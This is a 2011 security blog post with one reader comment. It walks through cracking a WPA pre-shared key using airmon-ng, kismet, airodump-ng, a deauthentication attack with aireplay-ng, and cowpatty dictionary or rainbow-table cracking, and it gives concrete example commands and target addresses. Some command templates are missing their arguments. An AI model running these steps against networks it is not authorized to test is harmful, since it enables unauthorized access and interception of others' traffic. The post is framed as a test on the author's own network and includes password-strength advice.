Hacking the WPA Airwaves

Monday, May 16, 2011

Mark Bennett


It is interesting how many people believe that their wireless is secure because they are using WPA.

Well we did a test recently and were able to basically password guess our way with a dictionary attack using either a straight dictionary or a rainbow table. 

The cool thing is I bought an ALFA USB antenna and could sit down at the corner coffee place and still see my wireless access point.

Security people: Be sure that your WPA password is an unreadable string, not something found in a dictionary, and not a phrase that you can read like op3nth3p0dbayd00rs, the tables of today are too intelligent for that.

In a nutshell using linux this is how it is done: 

Part I

airmon-ng start wlan0 (this puts the wireless car in promiscuous mode)

kismet -c wlan0

  • close console window to see collection of packets
  • use alt + k to get to top pull down menu’s, turn on ability to see type of access points bsid and guess at IP address, channel #

Cntrl-C to exit kismet

airmon-ng stop wlan0

Part II

airmon-ng start wlan0

airodump-ng -c –bssid -w wlan0


airodump-ng -c 9 –bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0  * Note D-Link-01.cap is where the capture of all traffic will go

Now open another window as we need to force a re-conect from the target (see the Note below)

aireplay-ng -a -c wlan0


airepley-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0

You will see at the top of the airodump window a wpa re-key, capture some traffic and exit you will have captured all the traffic in the D-Link01.cap file.

Part III

Download either rainbow tables or direct dictionary from offensive security: offensive-security.com/wpa-tables

If using hashes (rainbow)

cowpatty -r -d -s


cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite

If using Dictionary words:

cowpatty -r -f -s


cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite

Note : If you are in an environment that has a lot of cell phones like the iPhone, (and they are using their wireless to connect to the network) we found these all go to sleep when their screen is turned off then their wireless Ethernet card has a wake-up when the screen is activated.

So you don’t need to send de-auth all you got to do is hang around long enough for someone to touch their iPhone or whatever cell and have it wake up it’s wireless and re-auth to the network, in other words there is the weakest link! —  LOL!

Happy Cracking...

As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY—I’m Out!

Cross-posted from Darknet Consulting

Possibly Related Articles:
Information Security
Encryption Wireless Hacking Dictionary Attack WPA Rainbow Tables
Post Rating I Like this!
Jan Popovic Hi Mark,

Thanks for sharing this.

Can you please suggest how long it took you to break the WPA PSK and what would therefore be your recommendation for the frequency of the automated key changes in the WPA Enterprise mode.


Jan Popovic
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.